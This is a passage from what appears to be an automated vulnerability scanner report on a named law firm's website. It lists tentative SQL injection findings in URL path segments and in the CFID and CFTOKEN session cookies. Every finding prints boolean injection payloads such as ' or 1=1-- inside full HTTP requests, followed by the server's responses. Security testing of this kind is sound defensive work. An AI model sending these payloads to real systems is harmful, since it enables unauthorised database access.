X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr3/garamond.swf18657485'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">

...[SNIP]...

1.55. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/gillsans.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13597788'%20or%201%3d1--%20 and 13597788'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr313597788'%20or%201%3d1--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr313597788'%20or%201%3d2--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.56. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sifr3/gillsans.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14043355'%20or%201%3d1--%20 and 14043355'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/gillsans.swf14043355'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/gillsans.swf14043355'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

1.57. http://www.curtis.com/sitecontent.cfm [CFID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 18432304%20or%201%3d1--%20 and 18432304%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:01:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175952;path=/
Set-Cookie: CFTOKEN=14488976;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.58. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 90677941%20or%201%3d1--%20 and 90677941%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175975;path=/
Set-Cookie: CFTOKEN=25170816;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.59. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/sitecontent.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382433'%20or%201%3d1--%20 and 15382433'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm15382433'%20or%201%3d1--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sitecontent.cfm15382433'%20or%201%3d2--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
